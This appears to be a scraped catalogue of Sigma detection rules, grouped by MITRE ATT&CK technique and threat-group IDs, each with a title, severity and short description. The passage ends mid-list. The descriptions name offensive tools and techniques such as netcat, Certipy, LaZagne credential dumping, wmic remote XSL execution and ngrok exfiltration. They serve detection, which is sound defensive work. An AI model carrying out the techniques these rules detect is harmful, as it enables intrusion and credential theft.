  • Certificate Private Key Acquired - Level: medium
    Description: Detects when an application acquires a certificate private key
  • Certificate Exported From Local Certificate Store - Level: medium
    Description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.
  • HackTool - Certify Execution - Level: high
    Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
  • HackTool - Certipy Execution - Level: high
    Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
  • User with Privileges Logon - Level: low
    Description: Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
attack.t1220 5
Show Rules (5)
  • WMIC Loading Scripting Libraries - Level: medium
    Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
  • Msxsl.EXE Execution - Level: medium
    Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
  • Remote XSL Execution Via Msxsl.EXE - Level: high
    Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • XSL Script Execution Via WMIC.EXE - Level: medium
    Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
attack.t1615 5
Show Rules (5)
  • Suspicious GPO Discovery With Get-GPO - Level: low
    Description: Detect use of Get-GPO to get one GPO or all the GPOs in a domain.
  • Gpresult Display Group Policy Information - Level: medium
    Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: medium
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: high
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
attack.t1095 4
Show Rules (4)
  • Netcat The Powershell Version - PowerShell Module - Level: medium
    Description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
  • Suspicious DNS Z Flag Bit Set - Level: medium
    Description: The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
  • Netcat The Powershell Version - Level: medium
    Description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
  • PUA - Netcat Suspicious Execution - Level: high
    Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
attack.t1069 4
Show Rules (4)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
attack.t1114 4
Show Rules (4)
  • PST Export Alert Using eDiscovery Alert - Level: medium
    Description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content
  • PST Export Alert Using New-ComplianceSearchAction - Level: medium
    Description: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.
  • Hacktool Ruler - Level: high
    Description: This events that are generated when using the hacktool Ruler by Sensepost
  • Exchange PowerShell Snap-Ins Usage - Level: high
    Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
attack.t1189 4
Show Rules (4)
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a flashplayer update from an unofficial location
  • Cross Site Scripting Strings - Level: high
    Description: Detects XSS attempts injected via GET requests in access logs
  • Possible DNS Rebinding - Level: medium
    Description: Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).
attack.t1553 4
Show Rules (4)
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Renamed BOINC Client Execution - Level: medium
    Description: Detects the execution of a renamed BOINC binary.
  • Suspicious RazerInstaller Explorer Subprocess - Level: high
    Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
  • Potential BOINC Software Execution (UC-Berkeley Signature) - Level: informational
    Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
attack.t1211 4
Show Rules (4)
  • Microsoft Malware Protection Engine Crash - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
  • Microsoft Malware Protection Engine Crash - WER - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Writing Of Malicious Files To The Fonts Folder - Level: medium
    Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
attack.t1072 4
Show Rules (4)
  • Restricted Software Access By SRP - Level: high
    Description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy
  • Suspicious Csi.exe Usage - Level: medium
    Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
  • PDQ Deploy Remote Adminstartion Tool Execution - Level: medium
    Description: Detect use of PDQ Deploy remote admin tool
  • PUA - Radmin Viewer Utility Execution - Level: medium
    Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
attack.s0139 4
Show Rules (4)
  • Hidden Executable In NTFS Alternate Data Stream - Level: medium
    Description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
  • Suspicious File Download From File Sharing Websites - File Stream - Level: high
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • Unusual File Download From File Sharing Websites - File Stream - Level: medium
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • HackTool Named File Stream Created - Level: high
    Description: Detects the creation of a named file stream with the imphash of a well-known hack tool
attack.t1008 4
Show Rules (4)
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
attack.t1518 4
Show Rules (4)
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Detected Windows Software Discovery - PowerShell - Level: medium
    Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Detected Windows Software Discovery - Level: medium
    Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
attack.t1569 4
Show Rules (4)
  • Psexec Execution - Level: medium
    Description: Detects user accept agreement execution in psexec commandline
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
attack.t1560 4
Show Rules (4)
  • Compressed File Creation Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
  • Compressed File Extraction Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
  • Conti NTDS Exfiltration Command - Level: high
    Description: Detects a command used by conti to exfiltrate NTDS
  • Compress-Archive Cmdlet Execution - Level: low
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
attack.t1498 3
Show Rules (3)
  • Deployment Deleted From Kubernetes Cluster - Level: low
    Description: Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.
  • OpenCanary - NTP Monlist Request - Level: high
    Description: Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
attack.t1136 3
Show Rules (3)
  • New Kubernetes Service Account Created - Level: low
    Description: Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.
  • AWS ElastiCache Security Group Created - Level: low
    Description: Detects when an ElastiCache security group has been created.
  • ESXi Account Creation Via ESXCLI - Level: medium
    Description: Detects user account creation on ESXi system via esxcli
attack.t1565 3
Show Rules (3)
  • AWS EC2 Disable EBS Encryption - Level: medium
    Description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
  • Google Cloud Re-identifies Sensitive Information - Level: medium
    Description: Identifies when sensitive information is re-identified in google Cloud.
  • Powershell Add Name Resolution Policy Table Rule - Level: high
    Description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
attack.t1526 3
Show Rules (3)
  • Discovery Using AzureHound - Level: high
    Description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
attack.t1124 3
Show Rules (3)
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Discovery of a System Time - Level: low
    Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
  • Use of W32tm as Timer - Level: high
    Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
attack.t1187 3
Show Rules (3)
  • Potential PetitPotam Attack Via EFS RPC Calls - Level: medium
    Description: Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
  • Possible PetitPotam Coerce Authentication Attempt - Level: high
    Description: Detect PetitPotam coerced authentication activity.
  • PetitPotam Suspicious Kerberos TGT Request - Level: high
    Description: Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.
attack.t1200 3
Show Rules (3)
  • USB Device Plugged - Level: low
    Description: Detects plugged/unplugged USB devices
  • Device Installation Blocked - Level: medium
    Description: Detects an installation of a device that is forbidden by the system policy
  • External Disk Drive Or USB Storage Device Was Recognized By The System - Level: low
    Description: Detects external disk drives or plugged-in USB devices.
attack.t1134 3
Show Rules (3)
  • HackTool - NoFilter Execution - Level: high
    Description: Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Detection of Possible Rotten Potato - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
attack.t1554 3
Show Rules (3)
  • HybridConnectionManager Service Installation - Level: high
    Description: Rule to detect the Hybrid Connection Manager service installation.
  • HybridConnectionManager Service Running - Level: high
    Description: Rule to detect the Hybrid Connection Manager service running on an endpoint.
  • DNS HybridConnectionManager Service Bus - Level: high
    Description: Detects Azure Hybrid Connection Manager services querying the Azure service bus service
attack.t1217 3
Show Rules (3)
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell - Level: low
    Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
  • File And SubFolder Enumeration Via Dir Command - Level: low
    Description: Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
  • Suspicious Where Execution - Level: low
    Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
attack.t1176 3
Show Rules (3)
  • Chromium Browser Instance Executed With Custom Extension - Level: medium
    Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
  • Suspicious Chromium Browser Instance Executed With Custom Extension - Level: high
    Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
attack.s0349 2
Show Rules (2)
  • Credential Dumping by LaZagne - Level: critical
    Description: Detects LSASS process access by LaZagne for credential dumping.
  • Credential Dumping Activity By Python Based Tool - Level: high
    Description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
attack.g0035 2
Show Rules (2)
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin Activity as Described by NCSC
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
attack.g0007 2
Show Rules (2)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
attack.g0045 2
Show Rules (2)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
attack.s0404 2
Show Rules (2)
  • Suspicious Esentutl Use - Level: high
    Description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Files with well-known filenames (sensitive files with credential data) copying
attack.t1609 2
Show Rules (2)
  • Potential Remote Command Execution In Pod Container - Level: medium
    Description: Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
  • Potential Sidecar Injection Into Running Deployment - Level: medium
    Description: Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.
attack.t1611 2
Show Rules (2)
  • Container With A hostPath Mount Created - Level: low
    Description: Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.
  • Privileged Container Deployed - Level: low
    Description: Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields
attack.t1588 2
Show Rules (2)
  • Antivirus Relevant File Paths Alerts - Level: high
    Description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Relevant Anti-Virus Signature Keywords In Application Log - Level: high
    Description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
attack.t1580 2
Show Rules (2)
  • Potential Bucket Enumeration on AWS - Level: low
    Description: Looks for potential enumeration of AWS buckets via ListBuckets.
  • Potential Backup Enumeration on AWS - Level: medium
    Description: Detects potential enumeration activity targeting an AWS instance backups
attack.t1589 2
Show Rules (2)
  • Azure AD Account Credential Leaked - Level: high
    Description: Indicates that the user's valid credentials have been leaked.
  • SSHD Error Message CVE-2018-15473 - Level: medium
    Description: Detects exploitation attempt using public exploit code for CVE-2018-15473
attack.t1621 2
Show Rules (2)
  • Multifactor Authentication Denied - Level: medium
    Description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
attack.t1586 2
Show Rules (2)
  • Bitbucket Unauthorized Access To A Resource - Level: critical
    Description: Detects unauthorized access attempts to a resource.
  • Bitbucket Unauthorized Full Data Export Triggered - Level: critical
    Description: Detects when full data export is attempted an unauthorized user.
attack.t1074 2
Show Rules (2)
  • Google Full Network Traffic Packet Capture - Level: medium
    Description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.
  • Cisco Stage Data - Level: low
    Description: Various protocols maybe used to put data on the device for exfil or infil
attack.t1030 2
Show Rules (2)
  • Split A File Into Pieces - Linux - Level: low
    Description: Detection use of the command "split" to split files into parts and possible transfer.
  • Split A File Into Pieces - Level: low
    Description: Detection use of the command "split" to split files into parts and possible transfer.
attack.s0508 2
Show Rules (2)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
attack.t1590 2
Show Rules (2)
  • PUA - Advanced IP/Port Scanner Update Check - Level: medium
    Description: Detect the update check performed by Advanced IP/Port Scanner utilities.
  • Suspicious DNS Query for IP Lookup Service APIs - Level: medium
    Description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.
attack.t1056 2
Show Rules (2)
  • Suspicious Network Communication With IPFS - Level: low
    Description: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.
  • DNS Query Request To OneLaunch Update Service - Level: low
    Description: Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.
attack.t1221 2
Show Rules (2)
  • Server Side Template Injection Strings - Level: high
    Description: Detects SSTI attempts sent via GET requests in access logs
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190) - Level: medium
    Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
attack.t1207 2
Show Rules (2)
  • Add or Remove Computer from DC - Level: low
    Description: Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.
  • Possible DC Shadow Attack - Level: medium
    Description: Detects DCShadow via create new SPN
attack.s0039 2
Show Rules (2)
  • Reconnaissance Activity - Level: high
    Description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1039 2
Show Rules (2)
  • Suspicious Access to Sensitive File Extensions - Level: medium
    Description: Detects known sensitive file extensions accessed on a network share
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
attack.g0091 2
Show Rules (2)
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1620 2
Show Rules (2)
  • Potential In-Memory Execution Using Reflection.Assembly - Level: medium
    Description: Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
attack.t1222 2
Show Rules (2)
  • PowerShell Script Change Permission Via Set-Acl - PsScript - Level: low
    Description: Detects PowerShell scripts set ACL to of a file or a folder
  • PowerShell Set-Acl On Windows Folder - PsScript - Level: high
    Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
attack.t1120 2
Show Rules (2)
  • Powershell Suspicious Win32_PnPEntity - Level: low
    Description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.
  • Fsutil Drive Enumeration - Level: low
    Description: Attackers may leverage fsutil to enumerated connected drives.
attack.t1185 2
Show Rules (2)
  • Potential Data Stealing Via Chromium Headless Debugging - Level: high
    Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
  • Browser Started with Remote Debugging - Level: medium
    Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
attack.s0108 2
Show Rules (2)
  • Firewall Disabled via Netsh.EXE - Level: medium
    Description: Detects netsh commands that turns off the Windows firewall
  • Potential Persistence Via Netsh Helper DLL - Level: medium
    Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
attack.t1595 2
Show Rules (2)
  • PUA - PingCastle Execution - Level: medium
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
  • PUA - PingCastle Execution From Potentially Suspicious Parent - Level: high
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
attack.t1539 2
Show Rules (2)
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • SQLite Firefox Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
attack.t1608 2
Show Rules (2)
  • Suspicious Download from Office Domain - Level: high
    Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
  • HybridConnectionManager Service Installation - Registry - Level: high
    Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
attack.t1006 2
Show Rules (2)
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools - Level: low
    Description: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts
  • Use of Debugfs to Access a Raw Disk - Level: medium
    Description: Detects access to a raw disk on a host to evade detection by security products.
attack.g0044 2
Show Rules (2)
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
attack.g0125 2
Show Rules (2)
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
attack.t1499 2
Show Rules (2)
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
  • Multiple Modsecurity Blocks - Level: medium
    Description: Detects multiple blocks by the mod_security module (Web Application Firewall)
attack.s0003 1
Show Rules (1)
  • Edit of .bash_profile and .bashrc - Level: medium
    Description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
attack.g0016 1
Show Rules (1)
  • APT29 - Level: high
    Description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
attack.s0160 1
Show Rules (1)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
attack.g0075 1
Show Rules (1)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
attack.g0096 1
Show Rules (1)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
attack.g0009 1
Show Rules (1)
  • Hurricane Panda Activity - Level: high
    Description: Detects Hurricane Panda Activity
attack.g0092 1
Show Rules (1)
  • TA505 Dropper Load Pattern - Level: critical
    Description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
attack.t1086 1
Show Rules (1)
  • PowerShell Execution - Level: medium
    Description: Detects execution of PowerShell
attack.t1525 1
Show Rules (1)
  • AWS ECS Task Definition That Queries The Credential Endpoint - Level: medium
    Description: Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
attack.t1578 1
Show Rules (1)
  • Azure Active Directory Hybrid Health AD FS New Server - Level: medium
    Description: This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
attack.t1484 1
Show Rules (1)
  • Changes to Device Registration Policy - Level: high
    Description: Monitor and alert for changes to the device registration policy.
attack.t1606 1
Show Rules (1)
  • SAML Token Issuer Anomaly - Level: high
    Description: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns
attack.t1199 1
Show Rules (1)
  • Microsoft 365 - User Restricted from Sending Email - Level: medium
    Description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
attack.t1014 1
Show Rules (1)
  • Triple Cross eBPF Rootkit Install Commands - Level: high
    Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
attack.s0482 1
Show Rules (1)
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
attack.s0402 1
Show Rules (1)
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
attack.t1495 1
Show Rules (1)
  • Cisco Denial of Service - Level: medium
